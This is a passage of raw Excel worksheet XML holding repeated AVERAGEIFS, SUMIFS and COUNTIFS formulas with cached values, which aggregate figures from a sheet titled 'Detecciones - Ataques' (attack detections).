        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GL$3:$GL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BE$131)
</f>
        <v>1</v>
      </c>
      <c r="BF155" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GL$3:$GL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BF$131)
</f>
        <v>1.5</v>
      </c>
      <c r="BG155" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GL$3:$GL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BG$131)
</f>
        <v>1</v>
      </c>
      <c r="BH155" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GL$3:$GL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BH$131)
</f>
        <v>396</v>
      </c>
      <c r="BI155" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BJ155" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BK155" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BL155" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GL$3:$GL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BL$131)
</f>
        <v>2</v>
      </c>
      <c r="BM155" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GL$3:$GL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BM$131)
</f>
        <v>15473.45935</v>
      </c>
      <c r="BN155" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GL$3:$GL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BN$131)
</f>
        <v>14364.89187</v>
      </c>
      <c r="BO155" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BP155" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BQ155" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GL$3:$GL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BQ$131)
</f>
        <v>1.004901961</v>
      </c>
      <c r="BR155" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BS155" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GL$3:$GL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BS$131)
</f>
        <v>5.5</v>
      </c>
      <c r="BT155" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BU155" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BV155" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GL$3:$GL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BV$131)
</f>
        <v>0</v>
      </c>
      <c r="BW155" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GL$3:$GL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BW$131)
</f>
        <v>10</v>
      </c>
      <c r="BX155" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BY155" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GL$3:$GL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BY$131)
</f>
        <v>2.6875</v>
      </c>
      <c r="BZ155" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GL$3:$GL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BZ$131)
</f>
        <v>1.081300813</v>
      </c>
      <c r="CA155" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CB155" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CC155" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CD155" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CE155" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CF155" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GL$3:$GL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CF$131)
</f>
        <v>7</v>
      </c>
      <c r="CG155" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CH155" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GL$3:$GL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CH$131)
</f>
        <v>8</v>
      </c>
      <c r="CI155" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GL$3:$GL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CI$131)
</f>
        <v>33</v>
      </c>
      <c r="CJ155" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CK155" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GL$3:$GL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CK$131)
</f>
        <v>16</v>
      </c>
      <c r="CL155" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CM155" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GL$3:$GL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CM$131)
</f>
        <v>90</v>
      </c>
      <c r="CN155" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GL$3:$GL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CN$131)
</f>
        <v>0</v>
      </c>
      <c r="CO155" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GL$3:$GL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CO$131)
</f>
        <v>4.375</v>
      </c>
      <c r="CP155" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GL$3:$GL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CP$131)
</f>
        <v>25.5</v>
      </c>
      <c r="CQ155" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GL$3:$GL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CQ$131)
</f>
        <v>7</v>
      </c>
      <c r="CR155" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CS155" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GL$3:$GL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CS$131)
</f>
        <v>0.2671796551</v>
      </c>
      <c r="CT155" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GL$3:$GL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CT$131)
</f>
        <v>0.003992015968</v>
      </c>
      <c r="CU155" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CV155" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GL$3:$GL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CV$131)
</f>
        <v>6</v>
      </c>
      <c r="CW155" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CX155" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GL$3:$GL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CX$131)
</f>
        <v>10.5</v>
      </c>
      <c r="CY155" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GL$3:$GL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CY$131)
</f>
        <v>17.5</v>
      </c>
      <c r="CZ155" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DA155" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DB155" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DC155" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DD155" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DE155" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DF155" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DG155" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DH155" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GL$3:$GL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DH$131)
</f>
        <v>2.064444444</v>
      </c>
      <c r="DI155" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DJ155" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GL$3:$GL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DJ$131)
</f>
        <v>1.545454545</v>
      </c>
      <c r="DK155" s="271"/>
    </row>
    <row r="156">
      <c r="J156" s="277"/>
      <c r="K156" s="512"/>
      <c r="L156" s="512"/>
      <c r="M156" s="512"/>
      <c r="N156" s="512"/>
      <c r="O156" s="278"/>
      <c r="Q156" s="271"/>
      <c r="R156" s="352" t="s">
        <v>2578</v>
      </c>
      <c r="S156" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BR$3:$BR$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BR$3:$BR$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
)
</f>
        <v>0.4506562253</v>
      </c>
      <c r="T156" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BR$3:$BR$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BR$3:$BR$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
)
</f>
        <v>0.01424340292</v>
      </c>
      <c r="U156" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BR$3:$BR$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BR$3:$BR$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
)
</f>
        <v>0.7372807018</v>
      </c>
      <c r="V156" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BR$3:$BR$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BR$3:$BR$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
)
</f>
        <v>0.125</v>
      </c>
      <c r="W156" s="532">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BR$3:$BR$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BR$3:$BR$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="X156" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BR$3:$BR$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BR$3:$BR$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
)
</f>
        <v>0.1428571429</v>
      </c>
      <c r="Y156" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BR$3:$BR$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BR$3:$BR$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
)
</f>
        <v>158.4</v>
      </c>
      <c r="Z156" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BR$3:$BR$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BR$3:$BR$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
)
</f>
        <v>336.880148</v>
      </c>
      <c r="AA156" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BR$3:$BR$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BR$3:$BR$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
)
</f>
        <v>0.1759693558</v>
      </c>
      <c r="AB156" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BR$3:$BR$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BR$3:$BR$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
)
</f>
        <v>1.5625</v>
      </c>
      <c r="AC156" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BR$3:$BR$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BR$3:$BR$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
)
</f>
        <v>2.4</v>
      </c>
      <c r="AD156" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BR$3:$BR$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BR$3:$BR$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
)
</f>
        <v>0.05639657327</v>
      </c>
      <c r="AE156" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BR$3:$BR$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BR$3:$BR$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
)
</f>
        <v>1.6</v>
      </c>
      <c r="AF156" s="502">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BR$3:$BR$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BR$3:$BR$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
)
</f>
        <v>0.03272727273</v>
      </c>
      <c r="AG156" s="271"/>
      <c r="AH156" s="352" t="s">
        <v>2578</v>
      </c>
      <c r="AI156" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BR$3:$BR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AI$131)
</f>
        <v>0.4846457838</v>
      </c>
      <c r="AJ156" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BR$3:$BR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AJ$131)
</f>
        <v>1</v>
      </c>
      <c r="AK156" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BR$3:$BR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AK$131)
</f>
        <v>0.25</v>
      </c>
      <c r="AL156" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BR$3:$BR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AL$131)
</f>
        <v>0</v>
      </c>
      <c r="AM156" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BR$3:$BR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AM$131)
</f>
        <v>0.01424340292</v>
      </c>
      <c r="AN156" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO156" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP156" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ156" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BR$3:$BR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AQ$131)
</f>
        <v>0.007894736842</v>
      </c>
      <c r="AR156" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BR$3:$BR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AR$131)
</f>
        <v>0.6666666667</v>
      </c>
      <c r="AS156" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT156" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BR$3:$BR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AT$131)
</f>
        <v>3</v>
      </c>
      <c r="AU156" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BR$3:$BR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AU$131)
</f>
        <v>2</v>
      </c>
      <c r="AV156" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BR$3:$BR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AV$131)
</f>
        <v>1</v>
      </c>
      <c r="AW156" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AX156" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BR$3:$BR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AX$131)
</f>
        <v>0.5</v>
      </c>
      <c r="AY156" s="534" t="s">
        <v>12</v>
      </c>
      <c r="AZ156" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BR$3:$BR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AZ$131)
</f>
        <v>0</v>
      </c>
      <c r="BA156" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BR$3:$BR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BA$131)
</f>
        <v>0</v>
      </c>
      <c r="BB156" s="534" t="s">
        <v>12</v>
      </c>
      <c r="BC156" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BR$3:$BR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BC$131)
</f>
        <v>0.3333333333</v>
      </c>
      <c r="BD156" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BE156" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BR$3:$BR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BE$131)
</f>
        <v>0</v>
      </c>
      <c r="BF156" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BR$3:$BR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BF$131)
</f>
        <v>0</v>
      </c>
      <c r="BG156" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BR$3:$BR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BG$131)
</f>
        <v>0</v>
      </c>
      <c r="BH156" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BR$3:$BR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BH$131)
</f>
        <v>792</v>
      </c>
      <c r="BI156" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BJ156" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BK156" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BL156" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BR$3:$BR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BL$131)
</f>
        <v>0</v>
      </c>
      <c r="BM156" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BR$3:$BR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BM$131)
</f>
        <v>9.359348739</v>
      </c>
      <c r="BN156" s="518">
